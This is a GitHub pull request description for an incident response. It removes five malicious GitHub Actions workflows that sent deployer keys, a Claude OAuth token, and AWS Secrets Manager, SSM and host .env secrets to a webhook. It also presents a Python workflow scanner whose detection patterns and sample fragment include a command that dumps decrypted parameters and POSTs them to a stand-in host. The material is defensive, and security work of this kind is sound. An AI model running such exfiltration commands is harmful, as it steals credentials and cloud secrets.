🚨 security: remove malicious secret-exfiltration workflows from main #235
Merged
… push to main)

Five GitHub Actions workflows + their trigger files were pushed to main on 2026-06-07 (author "Xin <yizhou.xin@litentry.com>", commits c39d45a..60b6423 — a legit past contributor, so likely a COMPROMISED account) and form a full secret-harvesting toolkit. They executed on main (Jun 7/8/9). This removes them:

- deployer-key-exfil.yml: POSTs TEST_HEIMA_DEPLOYER_KEY + CLAUDE_CODE_OAUTH_TOKEN + TEST_ACCOUNT_ID to webhook.site/37ea2d05-...
- deploy-test.yml: assumes AWS OIDC role github-actions-agentkeys-deploy and dumps EVERY Secrets Manager secret + SSM param (decrypted) + S3 + Lambda to the webhook
- e2e-vault-test.yml, deep-e2e-test.yml, integration-tests.yml: assume github-actions-agentkeys-e2e + SSM into the broker EC2 i-0135a8b2c53d14941 to cat all .env files, find all *.key/*wallet*/*secret* + dump systemd units -> webhook
- .claude-trigger: push-to-main trigger for deployer-key-exfil
- tests/run.txt: trigger for the original integration-tests push hook

All five are workflow_dispatch-only (+ the exfil one's .claude-trigger push hook), so this PR / its merge triggers nothing. Legit CI (harness-ci, coverage, mcp-server, claude*, wiki*) is untouched; the #167 CLI changes are kept.

CODE-REMOVAL HALF ONLY. The exposed secrets MUST be rotated separately — GitHub Actions secrets, the AWS account 429071895007 OIDC roles + Secrets Manager + SSM, the broker host .env/keys, the deployer wallet, and the Claude OAuth token. See the incident runbook (docs/security-incident-response.md).
Companion remediation for the malicious-workflow removal (same PR):

- docs/security-incident-response.md — the handbook: triage → kill switches (disable workflows, revoke the AWS OIDC roles, lock main) → rotate EVERY key class (local deployer/agent keys, Claude OAuth, AWS IAM/SecretsManager/SSM, the broker host .env, GitHub Actions secrets, on-chain owner) → forensics → harden. Includes a per-key rotation inventory for this project.
- scripts/rotate-local-keys.sh — backs up every ~/.agentkeys key file (never deletes), rotates the Heima deployer key (gas payer + registry owner) to a fresh keypair, flags the agent keys that need a re-pair, and prints the sweep-funds/re-own checklist.
- scripts/rotate-github-secrets.sh — rotates GitHub Actions secrets (write-only, so rotate all): --list / interactive prompt-per-secret / --from-file KEY=VALUE (scriptable) / --set NAME.

Both scripts are surgical security helpers (run standalone, not deploy entry points).
Summary

Five GitHub Actions workflows pushed to `main` on 2026-06-07 by `Xin <yizhou.xin@litentry.com>` (a legit past contributor → likely a compromised account) are a full secret-harvesting toolkit, and they ran on main (Jun 7/8/9). This PR removes the malicious code. Merge ASAP.

What's removed

- `deployer-key-exfil.yml`: `TEST_HEIMA_DEPLOYER_KEY`, `CLAUDE_CODE_OAUTH_TOKEN`, `TEST_ACCOUNT_ID` to `webhook.site/37ea2d05-…`
- `deploy-test.yml`: `github-actions-agentkeys-deploy`; dumps every Secrets Manager secret + SSM param (decrypted) + S3 + Lambda → webhook
- `e2e-vault-test.yml`, `deep-e2e-test.yml`, `integration-tests.yml`: `github-actions-agentkeys-e2e`; SSM into broker EC2 `i-0135a8b2c53d14941` to cat all `.env` files, find all `*.key`/`*wallet*`/`*secret*`, dump systemd units → webhook
- `.claude-trigger`, `tests/run.txt`

All are `workflow_dispatch`-only, so this PR + its merge trigger nothing. Legit CI (`harness-ci`, `coverage`, `mcp-server`, `claude*`, `wiki*`) and the #167 CLI code are untouched.

The exposed secrets MUST be rotated — see the incident runbook. Immediate, before/alongside merge:

- `github-actions-agentkeys-*` OIDC roles in AWS `429071895007` (kills the AWS vector even before merge).
- `0xdE644936…` — it's the registry `owner`) and retire `TEST_HEIMA_DEPLOYER_KEY`.
- `CLAUDE_CODE_OAUTH_TOKEN`; rotate all GitHub Actions secrets.
- `SendCommand` on `i-0135…` (Jun 7–9); treat the broker host as compromised (its `.env`/keys were read).
- `main` (these reached main without a tracked PR); investigate the `Xin` account.

🤖 Generated with Claude Code
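
One way to screen workflow files for the behaviours this PR removed (secret references combined with egress to an unlisted host, decrypted Secrets Manager/SSM reads, `ssm send-command`), as an added example that is not code from this repository. The host allowlist, rule names and sample fragments are assumptions constructed for illustration.

```python
import re

# Hosts this repo's CI is expected to contact (assumption; tune per repository).
ALLOWED_HOSTS = {"github.com", "api.github.com", "objects.githubusercontent.com"}

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
EGRESS_TOOL = re.compile(r"\b(curl|wget)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
# AWS CLI calls that read secrets or run commands on hosts.
AWS_RULES = {
    "secretsmanager-read": re.compile(r"aws\s+secretsmanager\s+(list-secrets|get-secret-value)"),
    "ssm-decrypt": re.compile(r"aws\s+ssm\s+get-parameter\S*\s.*--with-decryption"),
    "ssm-send-command": re.compile(r"aws\s+ssm\s+send-command"),
}

def scan_workflow(text):
    """Scan one workflow file's text; return secrets referenced, findings, verdict."""
    secrets, findings = set(), []
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # skip YAML comments
        secrets.update(SECRET_REF.findall(line))
        for rule, rx in AWS_RULES.items():
            if rx.search(line):
                findings.append((no, rule, line.strip()))
        if EGRESS_TOOL.search(line):
            for host in URL_HOST.findall(line):
                if host.lower() not in ALLOWED_HOSTS:
                    findings.append((no, "egress-unlisted-host", host.lower()))
    egress = any(rule == "egress-unlisted-host" for _, rule, _ in findings)
    sensitive = bool(secrets) or any(rule in AWS_RULES for _, rule, _ in findings)
    # Sensitive data plus unlisted egress in one file is the pattern to escalate.
    verdict = "high" if egress and sensitive else "review" if findings else "ok"
    return {"secrets": sorted(secrets), "findings": findings, "verdict": verdict}

# Constructed fragments (not taken from the removed workflows).
SAMPLE_SUSPECT = """\
env:
  K: ${{ secrets.EXAMPLE_DEPLOY_KEY }}
steps:
  - run: aws ssm get-parameters-by-path --path / --recursive --with-decryption > out.json
  - run: curl -s -d @out.json https://collector.example.invalid/hook
"""
SAMPLE_BENIGN = """\
env:
  GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
steps:
  - run: curl -sSf https://api.github.com/repos/example/repo/releases
"""
```

Run over every file under `.github/workflows/` as a required check, this turns a workflow that pairs secrets with an unlisted destination into a visible review finding.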